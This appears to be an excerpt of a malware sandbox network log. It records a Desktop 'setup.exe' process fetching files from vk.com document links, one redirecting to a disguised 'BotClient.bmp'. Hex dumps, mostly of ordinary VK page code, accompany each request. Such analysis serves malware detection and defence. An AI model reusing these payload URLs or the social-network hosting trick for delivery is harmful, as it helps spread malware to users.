2024-07-01 22:05:10 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-07-01 22:05:10 UTC	16384	IN	Data Raw: b6 39 8e fb 57 8f 8b 6c 3b ad c5 01 79 83 65 e4 c0 ca bd a8 c6 19 25 b4 22 98 54 34 b1 b4 88 85 eb 22 19 bf 76 1a 78 a2 15 00 a7 93 83 ce 6d 15 34 8e 24 39 d1 84 aa 89 b6 0e e4 76 3c 9c e4 60 80 41 01 70 97 64 68 3f 28 eb 38 4a 09 bb ad 57 0f 32 2b 5d b0 da 6c 75 bf a9 d0 ca fa d7 aa 21 91 51 09 fa 8d 2a 48 23 3d 0d 45 15 d9 21 e2 b7 e9 ca 5e ad 9f 1b ac ae 5c 22 36 38 97 1e 91 2a a8 64 b3 3e 77 15 c0 e2 70 0a 5a 1d 1c 62 07 9e 16 a8 98 2f 0d d9 91 5c ae aa 00 a7 3a 1c 8e 39 a8 fb f3 b8 96 1b 31 a5 54 55 18 b7 a5 3b fb 96 15 b1 74 37 57 42 53 9f 2e 37 b9 b0 09 9a 21 3f 67 48 1d 02 65 c3 7b 6e 3d b5 16 5a 25 b7 a6 28 51 40 92 dd c4 d8 9e 90 0c f8 6e 11 cf c2 f4 00 58 4f a7 30 05 4f d5 41 4b 8c 0c 5b 5c 69 f3 4e ca e7 70 19 6c 3f ba d3 63 4b 70 be 7c 78 db Data Ascii: 9Wl;ye%"T4"vxm4$9v<`Apdh?(8JW2+]lu!QH#=E!^\"68d>wpZb/\:91TU;t7WBS.7!?gHe{n=Z%(Q@nXO0OAK[\iNpl?cKp\|x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49749	87.240.132.78	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:10 UTC	319	OUT	GET /doc851967711_678869252?hash=7enX4Yf9Eh9a580ka8ZSEsnG3OhzAssallq1mEISP3P&dl=j8nlfPwylDCi59wUX6tJ9uBa1hYeg1sJKQmMIBqlpjL&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-07-01 22:05:11 UTC	1221	IN	HTTP/1.1 302 Found Server: kittenx Date: Mon, 01 Jul 2024 22:05:11 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: close X-Powered-By: KPHP/7.4.117350 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Fri, 04 Jul 2025 15:24:52 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9070567544811004244_7DfrDFbNwfRTez2f3hZznFwCP3wklRmlzFCWxprTCGX; expires=Tue, 01 Jul 2025 22:05:11 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Location: https://sun6-23.userapi.com/c237031/u851967711/docs/d44/57796f4397b6/BotClient.bmp?extra=Uo921g-adSvvTWhdB6yDb5HdFI5_X3VJlRVmHM-Bh6mJlvI7hkGi94eW7KfU-ssLh3GfPV8Ees6kZM0RD1upQfkxRtTtcM3LgknqFomcBUvMb567aPkC4b-b3Csz0akrGpBI454GBQIw X-Frontend: front918304 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: ycFuEIqRKYf6vwhUpDs97-K09v0gPg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49750	87.240.132.78	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:11 UTC	328	OUT	GET /doc461844031_680356434?hash=KmXLjZzwyKBjmzxff0Jo9U1YwRL71yZftAbVL5kdyKD&dl=3v6LT2A7IS0PX4HrE4vRkDm0d4mbocnTvyEbLzKxGUP&api=1&no_preview=1#def_meta HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-07-01 22:05:11 UTC	2476	IN	HTTP/1.1 200 OK Server: kittenx Date: Mon, 01 Jul 2024 22:05:11 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 504885 Connection: close X-Powered-By: KPHP/7.4.117350 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Tue, 01 Jul 2025 08:41:51 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9059027070766004568_yz4HVGhDwx4p8490oP7ZTi9vDlU03vpWAB2aXofLArs; expires=Tue, 01 Jul 2025 22:05:11 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixlgck=5c45e475e3e545a053; expires=Tue, 01 Jul 2025 21:37:05 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixstid=883261699_4hF4dTG6f5vpGrdfTlkyHczRSMyaJxilLFZOPCUVago; expires=Sun, 29 Jun 2025 20:32:57 GMT; path=/; domain=.vk.com; secure; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru htt [TRUNCATED] X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front925304 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: _nOE4mNa4pnf932K9zNwtO_-Ctz5OA
2024-07-01 22:05:11 UTC	13908	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 27 65 6e 27 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 76 6b 2e 63 6f 6d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 76 6b 2e 63 6f 6d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 69 Data Ascii: <!DOCTYPE html><html lang='en' dir='ltr'><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><link rel="preconnect" href="https://login.vk.com" /><link rel="preconnect" href="https://api.vk.com" /><link rel="shortcut icon" href="/images/i
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 32 32 65 76 65 6e 6f 64 64 25 32 32 25 32 30 63 6c 69 70 2d 72 75 6c 65 25 33 44 25 32 32 65 76 65 6e 6f 64 64 25 32 32 25 32 30 64 25 33 44 25 32 32 4d 32 2e 34 34 25 32 30 34 2e 31 38 43 32 25 32 30 35 2e 30 34 25 32 30 32 25 32 30 36 2e 31 36 25 32 30 32 25 32 30 38 2e 34 76 33 2e 32 63 30 25 32 30 32 2e 32 34 25 32 30 30 25 32 30 33 2e 33 36 2e 34 34 25 32 30 34 2e 32 32 61 34 25 32 30 34 25 32 30 30 25 32 30 30 30 31 2e 37 34 25 32 30 31 2e 37 34 63 2e 38 36 2e 34 34 25 32 30 31 2e 39 38 2e 34 34 25 32 30 34 2e 32 32 2e 34 34 68 33 2e 32 63 32 2e 32 34 25 32 30 30 25 32 30 33 2e 33 36 25 32 30 30 25 32 30 34 2e 32 32 2d 2e 34 34 61 34 25 32 30 34 25 32 30 30 25 32 30 30 30 31 2e 37 34 2d 31 2e 37 34 63 2e 34 34 2d 2e 38 36 2e 34 34 2d 31 2e 39 38 2e Data Ascii: 22evenodd%22%20clip-rule%3D%22evenodd%22%20d%3D%22M2.44%204.18C2%205.04%202%206.16%202%208.4v3.2c0%202.24%200%203.36.44%204.22a4%204%200%20001.74%201.74c.86.44%201.98.44%204.22.44h3.2c2.24%200%203.36%200%204.22-.44a4%204%200%20001.74-1.74c.44-.86.44-1.98.
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 64 25 32 32 25 33 45 25 33 43 70 61 74 68 25 32 30 64 25 33 44 25 32 32 4d 34 31 30 2e 33 25 32 30 31 37 2e 32 6c 2d 31 2e 31 25 32 30 31 36 25 32 32 25 32 46 25 33 45 25 33 43 70 61 74 68 25 32 30 64 25 33 44 25 32 32 4d 34 31 33 2e 32 25 32 30 31 36 2e 36 6c 2d 31 30 2e 34 25 32 30 31 34 2e 38 25 32 32 25 32 30 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 25 33 44 25 32 32 31 2e 34 32 36 30 33 35 38 39 38 32 31 35 33 37 39 31 25 32 43 31 36 2e 35 37 33 39 36 34 31 30 31 30 37 34 30 36 25 32 32 25 32 30 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 25 33 44 25 32 32 39 2e 37 25 32 32 25 32 46 25 33 45 25 33 43 70 61 74 68 25 32 30 64 25 33 44 25 32 32 4d 34 31 33 2e 36 25 32 30 31 39 2e 35 4c 33 39 39 25 32 30 32 36 25 32 32 25 32 46 25 33 45 25 Data Ascii: d%22%3E%3Cpath%20d%3D%22M410.3%2017.2l-1.1%2016%22%2F%3E%3Cpath%20d%3D%22M413.2%2016.6l-10.4%2014.8%22%20stroke-dasharray%3D%221.4260358982153791%2C16.57396410107406%22%20stroke-dashoffset%3D%229.7%22%2F%3E%3Cpath%20d%3D%22M413.6%2019.5L399%2026%22%2F%3E%
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 72 79 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 30 70 78 7d 0a 2e 66 6f 6f 74 65 72 5f 77 72 61 70 3a 65 6d 70 74 79 7b 70 61 64 64 69 6e 67 3a 76 61 72 28 2d 2d 70 61 67 65 2d 62 6c 6f 63 6b 2d 6f 66 66 73 65 74 2c 20 31 35 70 78 29 30 20 30 7d 0a 2e 66 6f 6f 74 65 72 5f 77 72 61 70 2e 73 69 6d 70 6c 65 7b 6d 61 72 67 69 6e 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 0a 2e 66 6f 6f 74 65 72 5f 77 72 61 70 2e 73 69 6d 70 6c 65 20 2e 66 6f 6f 74 65 72 5f 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 0a 2e 66 6f 6f 74 65 72 5f 6e 61 76 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 74 65 78 74 5f 73 75 62 68 65 61 64 29 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 Data Ascii: ry);margin-top:40px}.footer_wrap:empty{padding:var(--page-block-offset, 15px)0 0}.footer_wrap.simple{margin:0;width:auto;clear:both}.footer_wrap.simple .footer_links{display:none}.footer_nav{color:var(--vkui--color_text_subhead);display:flex;justify-c
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 37 37 2c 20 30 2e 36 36 29 3b 2d 2d 62 6c 61 63 6b 5f 62 6c 75 65 34 35 5f 61 6c 70 68 61 31 30 3a 72 67 62 61 28 30 2c 20 35 37 2c 20 31 31 35 2c 20 30 2e 31 30 29 3b 2d 2d 62 6c 75 65 5f 34 30 30 3a 23 35 31 38 31 62 38 3b 2d 2d 62 6c 75 65 5f 61 34 30 30 3a 23 34 34 37 62 62 61 3b 2d 2d 62 6c 75 65 5f 34 30 30 5f 61 6c 70 68 61 32 30 3a 72 67 62 61 28 38 31 2c 20 31 32 39 2c 20 31 38 34 2c 20 30 2e 32 30 29 3b 2d 2d 62 6c 75 65 5f 34 30 30 5f 61 6c 70 68 61 34 38 3a 72 67 62 61 28 38 31 2c 20 31 32 39 2c 20 31 38 34 2c 20 30 2e 34 39 29 3b 2d 2d 62 6c 75 65 5f 34 32 30 3a 23 34 61 37 36 61 38 3b 2d 2d 62 6c 75 65 5f 35 35 30 3a 23 33 34 36 32 39 37 3b 2d 2d 62 6c 75 65 5f 36 30 30 3a 23 32 61 35 38 38 35 3b 2d 2d 62 6c 75 65 5f 36 34 30 3a 23 32 32 34 Data Ascii: 77, 0.66);--black_blue45_alpha10:rgba(0, 57, 115, 0.10);--blue_400:#5181b8;--blue_a400:#447bba;--blue_400_alpha20:rgba(81, 129, 184, 0.20);--blue_400_alpha48:rgba(81, 129, 184, 0.49);--blue_420:#4a76a8;--blue_550:#346297;--blue_600:#2a5885;--blue_640:#224
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 66 69 65 6c 64 5f 68 6f 72 69 7a 6f 6e 74 61 6c 5f 70 61 64 64 69 6e 67 2d 2d 72 65 67 75 6c 61 72 3a 31 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 62 75 74 74 6f 6e 5f 70 61 64 64 69 6e 67 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2d 2d 72 65 67 75 6c 61 72 3a 31 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 61 72 72 6f 77 5f 70 61 64 64 69 6e 67 2d 2d 72 65 67 75 6c 61 72 3a 31 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 74 6f 6f 6c 74 69 70 5f 6d 61 72 67 69 6e 2d 2d 72 65 67 75 6c 61 72 3a 38 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 69 63 6f 6e 5f 75 5f 69 2d 2d 72 65 67 75 6c 61 72 3a 31 36 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 61 76 61 74 61 72 5f 78 5f 73 2d 2d 72 65 67 75 6c Data Ascii: x;--vkui--size_field_horizontal_padding--regular:12px;--vkui--size_button_padding_horizontal--regular:12px;--vkui--size_arrow_padding--regular:12px;--vkui--size_tooltip_margin--regular:8px;--vkui--size_icon_u_i--regular:16px;--vkui--size_avatar_x_s--regul
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 74 5f 70 75 72 70 6c 65 2d 2d 61 63 74 69 76 65 3a 23 36 61 35 36 64 38 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 76 69 6f 6c 65 74 3a 23 37 39 32 65 63 30 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 76 69 6f 6c 65 74 2d 2d 68 6f 76 65 72 3a 23 37 34 32 64 62 62 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 76 69 6f 6c 65 74 2d 2d 61 63 74 69 76 65 3a 23 36 66 32 63 62 36 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 72 61 73 70 62 65 72 72 79 5f 70 69 6e 6b 3a 23 65 30 33 66 61 62 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 72 61 73 70 62 65 72 72 79 5f 70 69 6e 6b 2d 2d 68 6f 76 65 72 3a 23 64 37 33 64 61 37 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f Data Ascii: t_purple--active:#6a56d8;--vkui--color_accent_violet:#792ec0;--vkui--color_accent_violet--hover:#742dbb;--vkui--color_accent_violet--active:#6f2cb6;--vkui--color_accent_raspberry_pink:#e03fab;--vkui--color_accent_raspberry_pink--hover:#d73da7;--vkui--colo
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 69 6e 63 6f 6d 69 6e 67 5f 61 6c 74 65 72 6e 61 74 65 5f 68 69 67 68 6c 69 67 68 74 65 64 2d 2d 61 63 74 69 76 65 3a 23 65 33 65 35 65 62 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 3a 23 63 63 64 33 66 66 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 2d 2d 68 6f 76 65 72 3a 23 63 34 63 62 66 37 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 2d 2d 61 63 74 69 76 65 3a 23 62 63 Data Ascii: incoming_alternate_highlighted--active:#e3e5eb;--vkui--vkontakte_im_bubble_incoming_expiring_highlighted:#ccd3ff;--vkui--vkontakte_im_bubble_incoming_expiring_highlighted--hover:#c4cbf7;--vkui--vkontakte_im_bubble_incoming_expiring_highlighted--active:#bc
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 32 34 29 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 69 6e 70 75 74 5f 62 6f 72 64 65 72 3a 23 35 35 35 35 35 35 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 69 6e 70 75 74 5f 62 6f 72 64 65 72 2d 2d 68 6f 76 65 72 3a 23 35 63 35 63 35 63 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 69 6e 70 75 74 5f 62 6f 72 64 65 72 2d 2d 61 63 74 69 76 65 3a 23 36 33 36 33 36 33 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 73 65 61 72 63 68 5f 62 61 72 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 32 32 32 32 32 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 73 65 61 72 63 Data Ascii: (255, 255, 255, 0.24);--vkui--vkontakte_color_input_border:#555555;--vkui--vkontakte_color_input_border--hover:#5c5c5c;--vkui--vkontakte_color_input_border--active:#636363;--vkui--vkontakte_color_search_bar_background:#222222;--vkui--vkontakte_color_searc
2024-07-01 22:05:11 UTC	16384	IN	Data Raw: 50 61 6e 65 6c 48 65 61 64 65 72 7e 2e 76 6b 75 69 46 69 78 65 64 4c 61 79 6f 75 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 6f 70 7b 74 6f 70 3a 35 36 70 78 3b 74 6f 70 3a 63 61 6c 63 28 76 61 72 28 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 70 61 6e 65 6c 5f 68 65 61 64 65 72 5f 68 65 69 67 68 74 2d 2d 72 65 67 75 6c 61 72 29 20 2b 20 76 61 72 28 2d 2d 76 6b 75 69 5f 69 6e 74 65 72 6e 61 6c 2d 2d 73 61 66 65 5f 61 72 65 61 5f 69 6e 73 65 74 5f 74 6f 70 29 29 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 76 6b 75 69 72 6f 6f 74 2d 69 6f 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 73 68 6f 77 2d 62 61 63 6b 7b 30 25 7b 6f 70 61 63 69 74 79 3a 2e 33 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 76 6b 75 69 72 6f 6f 74 2d 69 6f 73 2d 61 6e 69 6d Data Ascii: PanelHeader~.vkuiFixedLayout--vertical-top{top:56px;top:calc(var(--vkui--size_panel_header_height--regular) + var(--vkui_internal--safe_area_inset_top))}@keyframes vkuiroot-ios-animation-show-back{0%{opacity:.3}to{opacity:0}}@keyframes vkuiroot-ios-anim

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49751	87.240.132.78	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:12 UTC	322	OUT	GET /doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfeEiGdn2IU9JTEdwqaRFTDnZMFQJn7v9z&api=1&no_preview=1#ww11 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-07-01 22:05:12 UTC	2492	IN	HTTP/1.1 200 OK Server: kittenx Date: Mon, 01 Jul 2024 22:05:12 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 504872 Connection: close X-Powered-By: KPHP/7.4.117350 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Thu, 26 Jun 2025 22:46:24 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9088159730856699166_uvmTDvKVg7uaOhomJei3Yu1n6zRoRTzujQmkyjqN75H; expires=Tue, 01 Jul 2025 22:05:12 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixlgck=374e8ec07457a99dc7; expires=Tue, 01 Jul 2025 16:06:24 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixstid=242356419_2xqWAu8IaSk4k7yzGaEqYJBhxAcSZqxhFf8GwzSXfco; expires=Tue, 01 Jul 2025 21:38:01 GMT; path=/; domain=.vk.com; secure; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru htt [TRUNCATED] X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front922504 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: lZM2RPMZxUWpwK7uUUoiNaZxqlfoHg
2024-07-01 22:05:12 UTC	13892	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 27 65 6e 27 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 76 6b 2e 63 6f 6d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 76 6b 2e 63 6f 6d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 69 Data Ascii: <!DOCTYPE html><html lang='en' dir='ltr'><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><link rel="preconnect" href="https://login.vk.com" /><link rel="preconnect" href="https://api.vk.com" /><link rel="shortcut icon" href="/images/i
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 25 32 30 66 69 6c 6c 2d 72 75 6c 65 25 33 44 25 32 32 65 76 65 6e 6f 64 64 25 32 32 25 32 30 63 6c 69 70 2d 72 75 6c 65 25 33 44 25 32 32 65 76 65 6e 6f 64 64 25 32 32 25 32 30 64 25 33 44 25 32 32 4d 32 2e 34 34 25 32 30 34 2e 31 38 43 32 25 32 30 35 2e 30 34 25 32 30 32 25 32 30 36 2e 31 36 25 32 30 32 25 32 30 38 2e 34 76 33 2e 32 63 30 25 32 30 32 2e 32 34 25 32 30 30 25 32 30 33 2e 33 36 2e 34 34 25 32 30 34 2e 32 32 61 34 25 32 30 34 25 32 30 30 25 32 30 30 30 31 2e 37 34 25 32 30 31 2e 37 34 63 2e 38 36 2e 34 34 25 32 30 31 2e 39 38 2e 34 34 25 32 30 34 2e 32 32 2e 34 34 68 33 2e 32 63 32 2e 32 34 25 32 30 30 25 32 30 33 2e 33 36 25 32 30 30 25 32 30 34 2e 32 32 2d 2e 34 34 61 34 25 32 30 34 25 32 30 30 25 32 30 30 30 31 2e 37 34 2d 31 2e 37 34 63 Data Ascii: %20fill-rule%3D%22evenodd%22%20clip-rule%3D%22evenodd%22%20d%3D%22M2.44%204.18C2%205.04%202%206.16%202%208.4v3.2c0%202.24%200%203.36.44%204.22a4%204%200%20001.74%201.74c.86.44%201.98.44%204.22.44h3.2c2.24%200%203.36%200%204.22-.44a4%204%200%20001.74-1.74c
